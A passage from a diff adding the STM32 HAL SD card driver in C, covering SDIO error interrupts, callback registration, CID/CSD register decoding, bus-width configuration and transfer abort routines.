SD_CONTEXT_IT) != 0U)) + { + SD_Write_IT(hsd); + } + +#if defined(SDIO_STA_STBITERR) + else if(__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_DCRCFAIL | SDIO_FLAG_DTIMEOUT | SDIO_FLAG_RXOVERR | SDIO_FLAG_TXUNDERR | SDIO_FLAG_STBITERR) != RESET) +#else /* SDIO_STA_STBITERR not defined */ + else if(__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_DCRCFAIL | SDIO_FLAG_DTIMEOUT | SDIO_FLAG_RXOVERR | SDIO_FLAG_TXUNDERR) != RESET) +#endif /* SDIO_STA_STBITERR */ + { + /* Set Error code */ + if(__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_DCRCFAIL) != RESET) + { + hsd->ErrorCode |= HAL_SD_ERROR_DATA_CRC_FAIL; + } + if(__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_DTIMEOUT) != RESET) + { + hsd->ErrorCode |= HAL_SD_ERROR_DATA_TIMEOUT; + } + if(__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_RXOVERR) != RESET) + { + hsd->ErrorCode |= HAL_SD_ERROR_RX_OVERRUN; + } + if(__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_TXUNDERR) != RESET) + { + hsd->ErrorCode |= HAL_SD_ERROR_TX_UNDERRUN; + } +#if defined(SDIO_STA_STBITERR) + if(__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_STBITERR) != RESET) + { + hsd->ErrorCode |= HAL_SD_ERROR_DATA_TIMEOUT; + } +#endif /* SDIO_STA_STBITERR */ + +#if defined(SDIO_STA_STBITERR) + /* Clear All flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_DATA_FLAGS | SDIO_FLAG_STBITERR); + + /* Disable all interrupts */ + __HAL_SD_DISABLE_IT(hsd, SDIO_IT_DATAEND | SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT|\ + SDIO_IT_TXUNDERR| SDIO_IT_RXOVERR | SDIO_IT_STBITERR); +#else /* SDIO_STA_STBITERR not defined */ + /* Clear All flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_DATA_FLAGS); + + /* Disable all interrupts */ + __HAL_SD_DISABLE_IT(hsd, SDIO_IT_DATAEND | SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT|\ + SDIO_IT_TXUNDERR| SDIO_IT_RXOVERR); +#endif /* SDIO_STA_STBITERR */ + + hsd->ErrorCode |= SDMMC_CmdStopTransfer(hsd->Instance); + + if((context & SD_CONTEXT_IT) != 0U) + { + /* Set the SD state to ready to be able to start again the process */ + hsd->State = HAL_SD_STATE_READY; + hsd->Context = SD_CONTEXT_NONE; +#if defined (USE_HAL_SD_REGISTER_CALLBACKS) && (USE_HAL_SD_REGISTER_CALLBACKS == 1U) + hsd->ErrorCallback(hsd); +#else + HAL_SD_ErrorCallback(hsd); +#endif /* USE_HAL_SD_REGISTER_CALLBACKS */ + } + else if((context & SD_CONTEXT_DMA) != 0U) + { + /* Abort the SD DMA channel */ + if(((context & SD_CONTEXT_WRITE_SINGLE_BLOCK) != 0U) || ((context & SD_CONTEXT_WRITE_MULTIPLE_BLOCK) != 0U)) + { + /* Set the DMA Tx abort callback */ + hsd->hdmatx->XferAbortCallback = SD_DMATxAbort; + /* Abort DMA in IT mode */ + if(HAL_DMA_Abort_IT(hsd->hdmatx) != HAL_OK) + { + SD_DMATxAbort(hsd->hdmatx); + } + } + else if(((context & SD_CONTEXT_READ_SINGLE_BLOCK) != 0U) || ((context & SD_CONTEXT_READ_MULTIPLE_BLOCK) != 0U)) + { + /* Set the DMA Rx abort callback */ + hsd->hdmarx->XferAbortCallback = SD_DMARxAbort; + /* Abort DMA in IT mode */ + if(HAL_DMA_Abort_IT(hsd->hdmarx) != HAL_OK) + { + SD_DMARxAbort(hsd->hdmarx); + } + } + else + { + hsd->ErrorCode = HAL_SD_ERROR_NONE; + hsd->State = HAL_SD_STATE_READY; + hsd->Context = SD_CONTEXT_NONE; +#if defined (USE_HAL_SD_REGISTER_CALLBACKS) && (USE_HAL_SD_REGISTER_CALLBACKS == 1U) + hsd->AbortCpltCallback(hsd); +#else + HAL_SD_AbortCallback(hsd); +#endif /* USE_HAL_SD_REGISTER_CALLBACKS */ + } + } + else + { + /* Nothing to do */ + } + } + else + { + /* Nothing to do */ + } +} + +/** + * @brief return the SD state + * @param hsd: Pointer to sd handle + * @retval HAL state + */ +HAL_SD_StateTypeDef HAL_SD_GetState(SD_HandleTypeDef *hsd) +{ + return hsd->State; +} + +/** +* @brief Return the SD error code +* @param hsd : Pointer to a SD_HandleTypeDef structure that contains + * the configuration information. +* @retval SD Error Code +*/ +uint32_t HAL_SD_GetError(SD_HandleTypeDef *hsd) +{ + return hsd->ErrorCode; +} + +/** + * @brief Tx Transfer completed callbacks + * @param hsd: Pointer to SD handle + * @retval None + */ +__weak void HAL_SD_TxCpltCallback(SD_HandleTypeDef *hsd) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsd); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SD_TxCpltCallback can be implemented in the user file + */ +} + +/** + * @brief Rx Transfer completed callbacks + * @param hsd: Pointer SD handle + * @retval None + */ +__weak void HAL_SD_RxCpltCallback(SD_HandleTypeDef *hsd) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsd); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SD_RxCpltCallback can be implemented in the user file + */ +} + +/** + * @brief SD error callbacks + * @param hsd: Pointer SD handle + * @retval None + */ +__weak void HAL_SD_ErrorCallback(SD_HandleTypeDef *hsd) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsd); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SD_ErrorCallback can be implemented in the user file + */ +} + +/** + * @brief SD Abort callbacks + * @param hsd: Pointer SD handle + * @retval None + */ +__weak void HAL_SD_AbortCallback(SD_HandleTypeDef *hsd) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsd); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SD_AbortCallback can be implemented in the user file + */ +} + +#if defined (USE_HAL_SD_REGISTER_CALLBACKS) && (USE_HAL_SD_REGISTER_CALLBACKS == 1U) +/** + * @brief Register a User SD Callback + * To be used instead of the weak (surcharged) predefined callback + * @param hsd : SD handle + * @param CallbackID : ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_SD_TX_CPLT_CB_ID SD Tx Complete Callback ID + * @arg @ref HAL_SD_RX_CPLT_CB_ID SD Rx Complete Callback ID + * @arg @ref HAL_SD_ERROR_CB_ID SD Error Callback ID + * @arg @ref HAL_SD_ABORT_CB_ID SD Abort Callback ID + * @arg @ref HAL_SD_MSP_INIT_CB_ID SD MspInit Callback ID + * @arg @ref HAL_SD_MSP_DEINIT_CB_ID SD MspDeInit Callback ID + * @param pCallback : pointer to the Callback function + * @retval status + */ +HAL_StatusTypeDef HAL_SD_RegisterCallback(SD_HandleTypeDef *hsd, HAL_SD_CallbackIDTypeDef CallbackID, pSD_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if(pCallback == NULL) + { + /* Update the error code */ + hsd->ErrorCode |= HAL_SD_ERROR_INVALID_CALLBACK; + return HAL_ERROR; + } + + /* Process locked */ + __HAL_LOCK(hsd); + + if(hsd->State == HAL_SD_STATE_READY) + { + switch (CallbackID) + { + case HAL_SD_TX_CPLT_CB_ID : + hsd->TxCpltCallback = pCallback; + break; + case HAL_SD_RX_CPLT_CB_ID : + hsd->RxCpltCallback = pCallback; + break; + case HAL_SD_ERROR_CB_ID : + hsd->ErrorCallback = pCallback; + break; + case HAL_SD_ABORT_CB_ID : + hsd->AbortCpltCallback = pCallback; + break; + case HAL_SD_MSP_INIT_CB_ID : + hsd->MspInitCallback = pCallback; + break; + case HAL_SD_MSP_DEINIT_CB_ID : + hsd->MspDeInitCallback = pCallback; + break; + default : + /* Update the error code */ + hsd->ErrorCode |= HAL_SD_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else if (hsd->State == HAL_SD_STATE_RESET) + { + switch (CallbackID) + { + case HAL_SD_MSP_INIT_CB_ID : + hsd->MspInitCallback = pCallback; + break; + case HAL_SD_MSP_DEINIT_CB_ID : + hsd->MspDeInitCallback = pCallback; + break; + default : + /* Update the error code */ + hsd->ErrorCode |= HAL_SD_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hsd->ErrorCode |= HAL_SD_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hsd); + return status; +} + +/** + * @brief Unregister a User SD Callback + * SD Callback is redirected to the weak (surcharged) predefined callback + * @param hsd : SD handle + * @param CallbackID : ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg @ref HAL_SD_TX_CPLT_CB_ID SD Tx Complete Callback ID + * @arg @ref HAL_SD_RX_CPLT_CB_ID SD Rx Complete Callback ID + * @arg @ref HAL_SD_ERROR_CB_ID SD Error Callback ID + * @arg @ref HAL_SD_ABORT_CB_ID SD Abort Callback ID + * @arg @ref HAL_SD_MSP_INIT_CB_ID SD MspInit Callback ID + * @arg @ref HAL_SD_MSP_DEINIT_CB_ID SD MspDeInit Callback ID + * @retval status + */ +HAL_StatusTypeDef HAL_SD_UnRegisterCallback(SD_HandleTypeDef *hsd, HAL_SD_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hsd); + + if(hsd->State == HAL_SD_STATE_READY) + { + switch (CallbackID) + { + case HAL_SD_TX_CPLT_CB_ID : + hsd->TxCpltCallback = HAL_SD_TxCpltCallback; + break; + case HAL_SD_RX_CPLT_CB_ID : + hsd->RxCpltCallback = HAL_SD_RxCpltCallback; + break; + case HAL_SD_ERROR_CB_ID : + hsd->ErrorCallback = HAL_SD_ErrorCallback; + break; + case HAL_SD_ABORT_CB_ID : + hsd->AbortCpltCallback = HAL_SD_AbortCallback; + break; + case HAL_SD_MSP_INIT_CB_ID : + hsd->MspInitCallback = HAL_SD_MspInit; + break; + case HAL_SD_MSP_DEINIT_CB_ID : + hsd->MspDeInitCallback = HAL_SD_MspDeInit; + break; + default : + /* Update the error code */ + hsd->ErrorCode |= HAL_SD_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else if (hsd->State == HAL_SD_STATE_RESET) + { + switch (CallbackID) + { + case HAL_SD_MSP_INIT_CB_ID : + hsd->MspInitCallback = HAL_SD_MspInit; + break; + case HAL_SD_MSP_DEINIT_CB_ID : + hsd->MspDeInitCallback = HAL_SD_MspDeInit; + break; + default : + /* Update the error code */ + hsd->ErrorCode |= HAL_SD_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hsd->ErrorCode |= HAL_SD_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hsd); + return status; +} +#endif /* USE_HAL_SD_REGISTER_CALLBACKS */ + +/** + * @} + */ + +/** @addtogroup SD_Exported_Functions_Group3 + * @brief management functions + * +@verbatim + ============================================================================== + ##### Peripheral Control functions ##### + ============================================================================== + [..] + This subsection provides a set of functions allowing to control the SD card + operations and get the related information + +@endverbatim + * @{ + */ + +/** + * @brief Returns information the information of the card which are stored on + * the CID register. + * @param hsd: Pointer to SD handle + * @param pCID: Pointer to a HAL_SD_CardCIDTypeDef structure that + * contains all CID register parameters + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SD_GetCardCID(SD_HandleTypeDef *hsd, HAL_SD_CardCIDTypeDef *pCID) +{ + pCID->ManufacturerID = (uint8_t)((hsd->CID[0] & 0xFF000000U) >> 24U); + + pCID->OEM_AppliID = (uint16_t)((hsd->CID[0] & 0x00FFFF00U) >> 8U); + + pCID->ProdName1 = (((hsd->CID[0] & 0x000000FFU) << 24U) | ((hsd->CID[1] & 0xFFFFFF00U) >> 8U)); + + pCID->ProdName2 = (uint8_t)(hsd->CID[1] & 0x000000FFU); + + pCID->ProdRev = (uint8_t)((hsd->CID[2] & 0xFF000000U) >> 24U); + + pCID->ProdSN = (((hsd->CID[2] & 0x00FFFFFFU) << 8U) | ((hsd->CID[3] & 0xFF000000U) >> 24U)); + + pCID->Reserved1 = (uint8_t)((hsd->CID[3] & 0x00F00000U) >> 20U); + + pCID->ManufactDate = (uint16_t)((hsd->CID[3] & 0x000FFF00U) >> 8U); + + pCID->CID_CRC = (uint8_t)((hsd->CID[3] & 0x000000FEU) >> 1U); + + pCID->Reserved2 = 1U; + + return HAL_OK; +} + +/** + * @brief Returns information the information of the card which are stored on + * the CSD register. + * @param hsd: Pointer to SD handle + * @param pCSD: Pointer to a HAL_SD_CardCSDTypeDef structure that + * contains all CSD register parameters + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SD_GetCardCSD(SD_HandleTypeDef *hsd, HAL_SD_CardCSDTypeDef *pCSD) +{ + pCSD->CSDStruct = (uint8_t)((hsd->CSD[0] & 0xC0000000U) >> 30U); + + pCSD->SysSpecVersion = (uint8_t)((hsd->CSD[0] & 0x3C000000U) >> 26U); + + pCSD->Reserved1 = (uint8_t)((hsd->CSD[0] & 0x03000000U) >> 24U); + + pCSD->TAAC = (uint8_t)((hsd->CSD[0] & 0x00FF0000U) >> 16U); + + pCSD->NSAC = (uint8_t)((hsd->CSD[0] & 0x0000FF00U) >> 8U); + + pCSD->MaxBusClkFrec = (uint8_t)(hsd->CSD[0] & 0x000000FFU); + + pCSD->CardComdClasses = (uint16_t)((hsd->CSD[1] & 0xFFF00000U) >> 20U); + + pCSD->RdBlockLen = (uint8_t)((hsd->CSD[1] & 0x000F0000U) >> 16U); + + pCSD->PartBlockRead = (uint8_t)((hsd->CSD[1] & 0x00008000U) >> 15U); + + pCSD->WrBlockMisalign = (uint8_t)((hsd->CSD[1] & 0x00004000U) >> 14U); + + pCSD->RdBlockMisalign = (uint8_t)((hsd->CSD[1] & 0x00002000U) >> 13U); + + pCSD->DSRImpl = (uint8_t)((hsd->CSD[1] & 0x00001000U) >> 12U); + + pCSD->Reserved2 = 0U; /*!< Reserved */ + + if(hsd->SdCard.CardType == CARD_SDSC) + { + pCSD->DeviceSize = (((hsd->CSD[1] & 0x000003FFU) << 2U) | ((hsd->CSD[2] & 0xC0000000U) >> 30U)); + + pCSD->MaxRdCurrentVDDMin = (uint8_t)((hsd->CSD[2] & 0x38000000U) >> 27U); + + pCSD->MaxRdCurrentVDDMax = (uint8_t)((hsd->CSD[2] & 0x07000000U) >> 24U); + + pCSD->MaxWrCurrentVDDMin = (uint8_t)((hsd->CSD[2] & 0x00E00000U) >> 21U); + + pCSD->MaxWrCurrentVDDMax = (uint8_t)((hsd->CSD[2] & 0x001C0000U) >> 18U); + + pCSD->DeviceSizeMul = (uint8_t)((hsd->CSD[2] & 0x00038000U) >> 15U); + + hsd->SdCard.BlockNbr = (pCSD->DeviceSize + 1U) ; + hsd->SdCard.BlockNbr *= (1UL << ((pCSD->DeviceSizeMul & 0x07U) + 2U)); + hsd->SdCard.BlockSize = (1UL << (pCSD->RdBlockLen & 0x0FU)); + + hsd->SdCard.LogBlockNbr = (hsd->SdCard.BlockNbr) * ((hsd->SdCard.BlockSize) / 512U); + hsd->SdCard.LogBlockSize = 512U; + } + else if(hsd->SdCard.CardType == CARD_SDHC_SDXC) + { + /* Byte 7 */ + pCSD->DeviceSize = (((hsd->CSD[1] & 0x0000003FU) << 16U) | ((hsd->CSD[2] & 0xFFFF0000U) >> 16U)); + + hsd->SdCard.BlockNbr = ((pCSD->DeviceSize + 1U) * 1024U); + hsd->SdCard.LogBlockNbr = hsd->SdCard.BlockNbr; + hsd->SdCard.BlockSize = 512U; + hsd->SdCard.LogBlockSize = hsd->SdCard.BlockSize; + } + else + { + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode |= HAL_SD_ERROR_UNSUPPORTED_FEATURE; + hsd->State = HAL_SD_STATE_READY; + return HAL_ERROR; + } + + pCSD->EraseGrSize = (uint8_t)((hsd->CSD[2] & 0x00004000U) >> 14U); + + pCSD->EraseGrMul = (uint8_t)((hsd->CSD[2] & 0x00003F80U) >> 7U); + + pCSD->WrProtectGrSize = (uint8_t)(hsd->CSD[2] & 0x0000007FU); + + pCSD->WrProtectGrEnable = (uint8_t)((hsd->CSD[3] & 0x80000000U) >> 31U); + + pCSD->ManDeflECC = (uint8_t)((hsd->CSD[3] & 0x60000000U) >> 29U); + + pCSD->WrSpeedFact = (uint8_t)((hsd->CSD[3] & 0x1C000000U) >> 26U); + + pCSD->MaxWrBlockLen= (uint8_t)((hsd->CSD[3] & 0x03C00000U) >> 22U); + + pCSD->WriteBlockPaPartial = (uint8_t)((hsd->CSD[3] & 0x00200000U) >> 21U); + + pCSD->Reserved3 = 0; + + pCSD->ContentProtectAppli = (uint8_t)((hsd->CSD[3] & 0x00010000U) >> 16U); + + pCSD->FileFormatGroup = (uint8_t)((hsd->CSD[3] & 0x00008000U) >> 15U); + + pCSD->CopyFlag = (uint8_t)((hsd->CSD[3] & 0x00004000U) >> 14U); + + pCSD->PermWrProtect = (uint8_t)((hsd->CSD[3] & 0x00002000U) >> 13U); + + pCSD->TempWrProtect = (uint8_t)((hsd->CSD[3] & 0x00001000U) >> 12U); + + pCSD->FileFormat = (uint8_t)((hsd->CSD[3] & 0x00000C00U) >> 10U); + + pCSD->ECC= (uint8_t)((hsd->CSD[3] & 0x00000300U) >> 8U); + + pCSD->CSD_CRC = (uint8_t)((hsd->CSD[3] & 0x000000FEU) >> 1U); + + pCSD->Reserved4 = 1; + + return HAL_OK; +} + +/** + * @brief Gets the SD status info. + * @param hsd: Pointer to SD handle + * @param pStatus: Pointer to the HAL_SD_CardStatusTypeDef structure that + * will contain the SD card status information + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SD_GetCardStatus(SD_HandleTypeDef *hsd, HAL_SD_CardStatusTypeDef *pStatus) +{ + uint32_t sd_status[16]; + uint32_t errorstate; + HAL_StatusTypeDef status = HAL_OK; + + errorstate = SD_SendSDStatus(hsd, sd_status); + if(errorstate != HAL_SD_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode |= errorstate; + hsd->State = HAL_SD_STATE_READY; + status = HAL_ERROR; + } + else + { + pStatus->DataBusWidth = (uint8_t)((sd_status[0] & 0xC0U) >> 6U); + + pStatus->SecuredMode = (uint8_t)((sd_status[0] & 0x20U) >> 5U); + + pStatus->CardType = (uint16_t)(((sd_status[0] & 0x00FF0000U) >> 8U) | ((sd_status[0] & 0xFF000000U) >> 24U)); + + pStatus->ProtectedAreaSize = (((sd_status[1] & 0xFFU) << 24U) | ((sd_status[1] & 0xFF00U) << 8U) | + ((sd_status[1] & 0xFF0000U) >> 8U) | ((sd_status[1] & 0xFF000000U) >> 24U)); + + pStatus->SpeedClass = (uint8_t)(sd_status[2] & 0xFFU); + + pStatus->PerformanceMove = (uint8_t)((sd_status[2] & 0xFF00U) >> 8U); + + pStatus->AllocationUnitSize = (uint8_t)((sd_status[2] & 0xF00000U) >> 20U); + + pStatus->EraseSize = (uint16_t)(((sd_status[2] & 0xFF000000U) >> 16U) | (sd_status[3] & 0xFFU)); + + pStatus->EraseTimeout = (uint8_t)((sd_status[3] & 0xFC00U) >> 10U); + + pStatus->EraseOffset = (uint8_t)((sd_status[3] & 0x0300U) >> 8U); + } + + /* Set Block Size for Card */ + errorstate = SDMMC_CmdBlockLength(hsd->Instance, BLOCKSIZE); + if(errorstate != HAL_SD_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode = errorstate; + hsd->State = HAL_SD_STATE_READY; + status = HAL_ERROR; + } + + return status; +} + +/** + * @brief Gets the SD card info. + * @param hsd: Pointer to SD handle + * @param pCardInfo: Pointer to the HAL_SD_CardInfoTypeDef structure that + * will contain the SD card status information + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SD_GetCardInfo(SD_HandleTypeDef *hsd, HAL_SD_CardInfoTypeDef *pCardInfo) +{ + pCardInfo->CardType = (uint32_t)(hsd->SdCard.CardType); + pCardInfo->CardVersion = (uint32_t)(hsd->SdCard.CardVersion); + pCardInfo->Class = (uint32_t)(hsd->SdCard.Class); + pCardInfo->RelCardAdd = (uint32_t)(hsd->SdCard.RelCardAdd); + pCardInfo->BlockNbr = (uint32_t)(hsd->SdCard.BlockNbr); + pCardInfo->BlockSize = (uint32_t)(hsd->SdCard.BlockSize); + pCardInfo->LogBlockNbr = (uint32_t)(hsd->SdCard.LogBlockNbr); + pCardInfo->LogBlockSize = (uint32_t)(hsd->SdCard.LogBlockSize); + + return HAL_OK; +} + +/** + * @brief Enables wide bus operation for the requested card if supported by + * card. + * @param hsd: Pointer to SD handle + * @param WideMode: Specifies the SD card wide bus mode + * This parameter can be one of the following values: + * @arg SDIO_BUS_WIDE_8B: 8-bit data transfer + * @arg SDIO_BUS_WIDE_4B: 4-bit data transfer + * @arg SDIO_BUS_WIDE_1B: 1-bit data transfer + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SD_ConfigWideBusOperation(SD_HandleTypeDef *hsd, uint32_t WideMode) +{ + SDIO_InitTypeDef Init; + uint32_t errorstate; + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_SDIO_BUS_WIDE(WideMode)); + + /* Change State */ + hsd->State = HAL_SD_STATE_BUSY; + + if(hsd->SdCard.CardType != CARD_SECURED) + { + if(WideMode == SDIO_BUS_WIDE_8B) + { + hsd->ErrorCode |= HAL_SD_ERROR_UNSUPPORTED_FEATURE; + } + else if(WideMode == SDIO_BUS_WIDE_4B) + { + errorstate = SD_WideBus_Enable(hsd); + + hsd->ErrorCode |= errorstate; + } + else if(WideMode == SDIO_BUS_WIDE_1B) + { + errorstate = SD_WideBus_Disable(hsd); + + hsd->ErrorCode |= errorstate; + } + else + { + /* WideMode is not a valid argument*/ + hsd->ErrorCode |= HAL_SD_ERROR_PARAM; + } + } + else + { + /* MMC Card does not support this feature */ + hsd->ErrorCode |= HAL_SD_ERROR_UNSUPPORTED_FEATURE; + } + + if(hsd->ErrorCode != HAL_SD_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->State = HAL_SD_STATE_READY; + status = HAL_ERROR; + } + else + { + /* Configure the SDIO peripheral */ + Init.ClockEdge = hsd->Init.ClockEdge; + Init.ClockBypass = hsd->Init.ClockBypass; + Init.ClockPowerSave = hsd->Init.ClockPowerSave; + Init.BusWide = WideMode; + Init.HardwareFlowControl = hsd->Init.HardwareFlowControl; + Init.ClockDiv = hsd->Init.ClockDiv; + (void)SDIO_Init(hsd->Instance, Init); + } + + /* Set Block Size for Card */ + errorstate = SDMMC_CmdBlockLength(hsd->Instance, BLOCKSIZE); + if(errorstate != HAL_SD_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode |= errorstate; + status = HAL_ERROR; + } + + /* Change State */ + hsd->State = HAL_SD_STATE_READY; + + return status; +} + +/** + * @brief Gets the current sd card data state. + * @param hsd: pointer to SD handle + * @retval Card state + */ +HAL_SD_CardStateTypeDef HAL_SD_GetCardState(SD_HandleTypeDef *hsd) +{ + uint32_t cardstate; + uint32_t errorstate; + uint32_t resp1 = 0; + + errorstate = SD_SendStatus(hsd, &resp1); + if(errorstate != HAL_SD_ERROR_NONE) + { + hsd->ErrorCode |= errorstate; + } + + cardstate = ((resp1 >> 9U) & 0x0FU); + + return (HAL_SD_CardStateTypeDef)cardstate; +} + +/** + * @brief Abort the current transfer and disable the SD. + * @param hsd: pointer to a SD_HandleTypeDef structure that contains + * the configuration information for SD module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SD_Abort(SD_HandleTypeDef *hsd) +{ + HAL_SD_CardStateTypeDef CardState; + uint32_t context = hsd->Context; + + /* DIsable All interrupts */ + __HAL_SD_DISABLE_IT(hsd, SDIO_IT_DATAEND | SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT|\ + SDIO_IT_TXUNDERR| SDIO_IT_RXOVERR); + + /* Clear All flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_DATA_FLAGS); + + CLEAR_BIT(hsd->Instance->DCTRL, SDIO_DCTRL_DTEN); + + if ((context & SD_CONTEXT_DMA) != 0U) + { + /* Disable the SD DMA request */ + hsd->Instance->DCTRL &= (uint32_t)~((uint32_t)SDIO_DCTRL_DMAEN); + + /* Abort the SD DMA Tx channel */ + if (((context & SD_CONTEXT_WRITE_SINGLE_BLOCK) != 0U) || ((context & SD_CONTEXT_WRITE_MULTIPLE_BLOCK) != 0U)) + { + if(HAL_DMA_Abort(hsd->hdmatx) != HAL_OK) + { + hsd->ErrorCode |= HAL_SD_ERROR_DMA; + } + } + /* Abort the SD DMA Rx channel */ + else if (((context & SD_CONTEXT_READ_SINGLE_BLOCK) != 0U) || ((context & SD_CONTEXT_READ_MULTIPLE_BLOCK) != 0U)) + { + if(HAL_DMA_Abort(hsd->hdmarx) != HAL_OK) + { + hsd->ErrorCode |= HAL_SD_ERROR_DMA; + } + } + else + { + /* Nothing to do */ + } + } + + hsd->State = HAL_SD_STATE_READY; + + /* Initialize the SD operation */ + hsd->Context = SD_CONTEXT_NONE; + + CardState = HAL_SD_GetCardState(hsd); + if((CardState == HAL_SD_CARD_RECEIVING) || (CardState == HAL_SD_CARD_SENDING)) + { + hsd->ErrorCode = SDMMC_CmdStopTransfer(hsd->Instance); + } + if(hsd->ErrorCode != HAL_SD_ERROR_NONE) + { + return HAL_ERROR; + } + return HAL_OK; +} + +/** + * @brief Abort the current transfer and disable the SD (IT mode). + * @param hsd: pointer to a SD_HandleTypeDef structure that contains + * the configuration information for SD module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SD_Abort_IT(SD_HandleTypeDef *hsd) +{ + HAL_SD_CardStateTypeDef CardState; + uint32_t context = hsd->Context; + + /* Disable All interrupts */ + __HAL_SD_DISABLE_IT(hsd, SDIO_IT_DATAEND | SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT|\ + SDIO_IT_TXUNDERR| SDIO_IT_RXOVERR); + + CLEAR_BIT(hsd->Instance->DCTRL, SDIO_DCTRL_DTEN); + + if ((context & SD_CONTEXT_DMA) != 0U) + { + /* Disable the SD DMA request */ + hsd->Instance->DCTRL &= (uint32_t)~((uint32_t)SDIO_DCTRL_DMAEN); + + /* Abort the SD DMA Tx channel */ + if (((context & SD_CONTEXT_WRITE_SINGLE_BLOCK) != 0U) || ((context & SD_CONTEXT_WRITE_MULTIPLE_BLOCK) != 0U)) + { + hsd->hdmatx->XferAbortCallback = SD_DMATxAbort; + if(HAL_DMA_Abort_IT(hsd->hdmatx) != HAL_OK) + { + hsd->hdmatx = NULL; + } + } + /* Abort the SD DMA Rx channel */ + else if (((context & SD_CONTEXT_READ_SINGLE_BLOCK) != 0U) || ((context & SD_CONTEXT_READ_MULTIPLE_BLOCK) != 0U)) + { + hsd->hdmarx->XferAbortCallback = SD_DMARxAbort; + if(HAL_DMA_Abort_IT(hsd->hdmarx) != HAL_OK) + { + hsd->hdmarx = NULL; + } + } + else + { + /* Nothing to do */ + } + } + /* No transfer ongoing on both DMA channels*/ + else + { + /* Clear All flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_DATA_FLAGS); + + CardState = HAL_SD_GetCardState(hsd); + hsd->State = HAL_SD_STATE_READY; + hsd->Context = SD_CONTEXT_NONE; + if((CardState == HAL_SD_CARD_RECEIVING) || (CardState == HAL_SD_CARD_SENDING)) + { + hsd->ErrorCode = SDMMC_CmdStopTransfer(hsd->Instance); + } + if(hsd->ErrorCode != HAL_SD_ERROR_NONE) + { + return HAL_ERROR; + } + else + { +#if defined (USE_HAL_SD_REGISTER_CALLBACKS) && (USE_HAL_SD_REGISTER_CALLBACKS == 1U) + hsd->AbortCpltCallback(hsd); +#else + HAL_SD_AbortCallback(hsd); +#endif /* USE_HAL_SD_REGISTER_CALLBACKS */ + } + } + + return HAL_OK; +} + +/** + * @} + */ + +/** + * @} + */ + +/* Private function ----------------------------------------------------------*/ +/** @addtogroup SD_Private_Functions + * @{ + */ + +/** + * @brief DMA SD transmit process complete callback + * @param hdma: DMA handle + * @retval None + */ +static void SD_DMATransmitCplt(DMA_HandleTypeDef *hdma) +{ + SD_HandleTypeDef* hsd = (SD_HandleTypeDef* )(hdma->Parent); + + /* Enable DATAEND Interrupt */ + __HAL_SD_ENABLE_IT(hsd, (SDIO_IT_DATAEND)); +} + +/** + * @brief DMA SD receive process complete callback + * @param hdma: DMA handle + * @retval None + */ +static void SD_DMAReceiveCplt(DMA_HandleTypeDef *hdma) +{ + SD_HandleTypeDef* hsd = (SD_HandleTypeDef* )(hdma->Parent); + uint32_t errorstate; + + /* Send stop command in multiblock write */ + if(hsd->Context == (SD_CONTEXT_READ_MULTIPLE_BLOCK | SD_CONTEXT_DMA)) + { + errorstate = SDMMC_CmdStopTransfer(hsd->Instance); + if(errorstate != HAL_SD_ERROR_NONE) + { + hsd->ErrorCode |= errorstate; +#if (USE_HAL_SD_REGISTER_CALLBACKS == 1) 